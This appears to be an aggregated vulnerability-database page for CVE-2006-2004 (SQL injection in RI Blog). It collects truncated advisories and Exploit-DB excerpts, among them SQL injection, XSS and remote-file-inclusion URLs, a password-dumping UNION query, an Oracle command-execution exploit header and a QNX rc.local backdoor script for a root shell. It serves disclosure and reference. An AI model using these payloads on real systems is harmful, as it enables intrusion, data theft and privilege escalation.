CVE-2006-2004
published 2006-04-25
CVE-2006-2004: Multiple SQL injection vulnerabilities in RI Blog 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password fields.
Priority P3 · 38 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 1.43% (69.7th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| michael_romedahl | ri_blog | — | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 9.3 CRITICAL
GHSA
GHSA-3j54-rx6j-frg9: Multiple SQL injection vulnerabilities in RI Blog 1
ghsa_unreviewed·2022-05-01
CVE-2006-2004 [HIGH] GHSA-3j54-rx6j-frg9: Multiple SQL injection vulnerabilities in RI Blog 1
Multiple SQL injection vulnerabilities in RI Blog 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password fields.
Red Hat
security flaw
vendor_redhat·2006-09-12·CVSS 5.1
CVE-2006-3311 [MEDIUM] security flaw
Buffer overflow in Adobe Flash Player 8.0.24.0 and earlier, Flash Professional 8, Flash MX 2004, and Flex 1.5 allows user-assisted remote attackers to execute arbitrary code via a long, dynamically created string in a SWF movie.
Red Hat
security flaw
vendor_redhat·2006-02-12·CVSS 7.5
CVE-2006-0709 [HIGH] security flaw
Buffer overflow in Metamail 2.7-50 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via e-mail messages with a long boundary attribute, a different vulnerability than CVE-2004-0105.
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2004-1051 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "()" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname.
Statement: We do not consider this to be a security issue:
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=139478#c1
Red Hat
CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
vendor_redhat·2004-11-11·CVSS 7.2
CVE-2005-4158 [HIGH] CVE-2004-1051 bash scripts run via Sudo can be subverted (CVE-2005-4158, CVE-2006-0151)
Sudo before 1.6.8 p12, when the Perl taint flag is off, does not clear the (1) PERLLIB, (2) PERL5LIB, and (3) PERL5OPT environment variables, which allows limited local users to cause a Perl script to include and execute arbitrary library files that have the same name as library files that are included by the script.
Statement: We do not consider this to be a security issue.
https://bugzilla.redhat.com/show_bug.cgi?id=139478#c1
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
No detection rules found.
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
---
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
Oracle 9i/10g - 'extproc' Local/Remote Command Execution
exploitdb·2006-12-19·CVSS 8.5
CVE-2004-1364 [HIGH] Oracle 9i/10g - 'extproc' Local/Remote Command Execution
---
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi
--
-- Directory traversal vulnerability in extproc in Oracle 9i and 10g
-- allows remote attackers to access arbitrary libraries outside of the
-- $ORACLE_HOME\bin directory (CVE-2004-1364).
--
-- This PL/SQL code exploits the Oracle extproc directory traversal bug
-- to remotely execute arbitrary OS commands with the privileges of the DBMS
-- user (the CREATE [ANY] LIBRARY privilege is needed).
--
-- See also:
-- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql
--
-- Vulnerable platforms:
-- Oracle
Exploit-DB
vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting
exploitdb·2006-11-20
CVE-2006-6153 vSpin Classified System 2004 - 'cat.asp?catname' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/cat.asp?cat=1&catname=[xss]
Exploit-DB
vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection
exploitdb·2006-11-20
CVE-2006-6152 vSpin Classified System 2004 - 'cat.asp?cat' SQL Injection
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/cat.asp?cat='[sql]
Exploit-DB
vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting
exploitdb·2006-11-20
CVE-2006-6153 vSpin Classified System 2004 - 'search.asp?minprice' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort=DESC&cat=0&menuSelect=1&type=1&city=1&minprice=[xss]
Exploit-DB
vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections
exploitdb·2006-11-20
CVE-2006-6152 vSpin Classified System 2004 - 'search.asp' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/21190/info
vSpin Classified System is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/search.asp?in=y&keyword='[sql]
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order='[sql]
http://www.example.com/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
ht
Exploit-DB
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
exploitdb·2006-10-04
CVE-2008-1609 JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
---
#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS © 2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://ww
Exploit-DB
Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
exploitdb·2006-07-06
CVE-2006-3431 Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution
---
source: https://www.securityfocus.com/bid/18872/info
Microsoft Excel is prone to a remote code-execution vulnerability.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users.
A proof-of-concept malicious code named 'Trojan.Hongmosa' is actively exploiting this vulnerability, which results in crashing Excel running on Simplified Chinese, Traditional Chinese, Japanese, or Korean Windows.
Note that Microsoft Office applications include functionality to embed Office files as objects contained in other Office files. As an example, Microsoft Word files may contain embedded malicious Microsoft Excel files, making Word documents another possible attack vect
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
exploitdb·2006-05-26
CVE-2006-2697 Easy-Content Forums 1.0 - Multiple SQL Injection / Cross-Site Scripting Vulnerabilities
---
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTION--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=SQL TEXT
### http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x
Example:
http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users
XSS--------------------------------------------------------
### http://[target]/[path]/userview.asp?startletter=xss TEXT
### http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT
Example:
http://[target]/[path]/topics.asp?catid=30&forumn
Exploit-DB
WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
exploitdb·2006-03-25
CVE-2006-1480 WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
this works with magic_quotes_gpc=Off\r\n";
echo "dork: WEBalbum 2004-2006 duda\r\n";
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$
Exploit-DB
QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
exploitdb·2006-02-08
CVE-2006-0623 QNX RTOS 6.3.0 - Insecure 'rc.local' Permissions System Crash / Privilege Escalation
---
#!/bin/sh
# this combines http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387
# and http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386
# into local r00t w00t t00t t00t, hugs and kisses from www.lort.dk.
# unset PAGER; man chmod | mail -s "urgent reading" [email protected]
# kokanin discovered this around august/september 2004
echo "performing check"
if [ -w /etc/rc.d/rc.local ] ;
then echo "check passed, backdooring system" &&
cat >/tmp/moo.c > /etc/rc.d/rc.local && echo "rc.local backdoored,\
crashing system" && echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb;
int main(){
setuid(0);
system("/bin/sh");
}
__EOF__
else echo "system is not a default QNX 6.3.0
Exploit-DB
AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection
exploitdb·2006-01-26
CVE-2006-0462 AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection
---
source: https://www.securityfocus.com/bid/16393/info
AndoNET Blog is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Version 2004.09.02 is vulnerable; other versions may also be affected.
http://www.example.com/adonet/index.php?ando=comentarios&entrada=1'%20union%20select%201,2,3,4/*
Exploit-DB
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
exploitdb·2006-01-09
CVE-2006-0030 Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution
---
source: https://www.securityfocus.com/bid/16181/info
Microsoft Excel is susceptible to a code-execution vulnerability. The issue presents itself when Excel tries to process malformed or corrupted XLS files.
Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-1.xls
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27055-2.xls
Exploit-DB
Oracle 9i - Multiple Vulnerabilities
exploitdb·2004-08-04·CVSS 8.5
CVE-2004-1364 [HIGH] Oracle 9i - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/10871/info
Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities.
The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others.
There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending.
Note that a number of unsupported versions of affected products may also potentially be vulnerable.
--
-- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $
--
-- raptor_oraextproc.sql - command exec via oracle extproc
-- Copyright (c) 2006 Marco Ivaldi
--
--
Bugzilla
CVE-2006-3311 security flaw
bugzilla·2018-08-16·CVSS 5.1
CVE-2006-3311 [MEDIUM] CVE-2006-3311 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in Adobe Flash Player 8.0.24.0 and earlier, Flash Professional 8, Flash MX 2004, and Flex 1.5 allows user-assisted remote attackers to execute arbitrary code via a long, dynamically created string in a SWF movie.
Bugzilla
CVE-2004-0885 mod_ssl SSLCipherSuite bypass
bugzilla·2008-01-29·CVSS 7.5
CVE-2004-0885 [HIGH] CVE-2004-0885 mod_ssl SSLCipherSuite bypass
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0885 to the following vulnerability:
The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
References:
http://www.apacheweek.com/features/security-20
http://issues.apache.org/bugzilla/show_bug.cgi?id=31505
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://lists.apple.com/archives/security-announce/2005/Aug/msg00000.html
http://lists.apple.com/archives/security-announce/2005//Aug/msg00001.html
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX
Bugzilla
CVE-2004-0940 httpd mod_include SSI overflow
bugzilla·2008-01-28·CVSS 7.8
CVE-2004-0940 [HIGH] CVE-2004-0940 httpd mod_include SSI overflow
Common Vulnerabilities and Exposures assigned an identifier CVE-2004-0940 to the following vulnerability:
Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
References:
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.debian.org/security/2004/dsa-594
http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
http://www.redhat.com/support/errata/RHSA-2004-600.html
http://marc.theaimsgroup.com/?l=bugtraq&m=109906660225051&w=2
http://www.apacheweek.com/features/security-13
http://www.redhat.com/support/errata/RHSA-2005-816.html
ht
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-26·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
+++ This bug was initially created as a clone of Bug #212237 +++
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
-- Additional comment from bressers@red
Bugzilla
CVE-2006-5467 Ruby CGI multipart parsing DoS
bugzilla·2006-10-25·CVSS 5.0
CVE-2006-5467 [MEDIUM] CVE-2006-5467 Ruby CGI multipart parsing DoS
Jeremy Kemper mailed this information to vendor-sec:
Fix an exploitable bug in CGI multipart parsing which affects Ruby <= 1.8.5
when the input stream returns "" (empty string) instead of nil on EOF.
Certain malformed multipart requests leave the parser in a non-terminating
state, leaving the program vulnerable to denial of service attack. The fix
more carefully checks for input stream EOF.
affected: standalone CGI, Mongrel
unaffected: FastCGI, mod_ruby, WEBrick
This fully closes a previously-reported but partially-fixed vulnerability:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0983
http://www.securityfocus.com/bid/11618/info
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Created attachment 139389
Proposed pat
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form of action argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CVE-2004-2660 O_DIRECT write sometimes leaks memory
bugzilla·2006-05-15·CVSS 4.9
CVE-2004-2660 [MEDIUM] CVE-2004-2660 O_DIRECT write sometimes leaks memory
It seems that O_DIRECT write sometimes leaks memory.
The upstream fix can be found here:
http://linux.bkbits.net:8080/linux-2.6/cset@4182a613oVsK0-8eCWpyYFrUf8rhLA
Discussion:
committed in stream E5 build 42.0.1. A test kernel with this patch is available
from http://people.redhat.com/~jbaron/rhel4/
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0617.html
---
committed in stream U5 build 42.4. A test kernel
Bugzilla
CVE-2004-1190 Continued raw access issues
bugzilla·2005-05-26·CVSS 2.1
CVE-2004-1190 [LOW] CVE-2004-1190 Continued raw access issues
CAN-2004-0813 described a flaw allowing anyone with read access to scsi hardware
the ability to write to it too, and this was fixed upstream in 2.6.8. However
since then a number of extra commits have taken place to fix firmware cdrom
issues -- see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=300162
These may affect RHEL4.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0101.html
References for CVE-2006-2004:
http://colander.altervista.org/advisory/riblog.txt
http://secunia.com/advisories/19783
http://www.securityfocus.com/archive/1/431868/100/0/threaded
http://www.securityfocus.com/bid/17654
http://www.vupen.com/english/advisories/2006/1489
https://exchange.xforce.ibmcloud.com/vulnerabilities/26132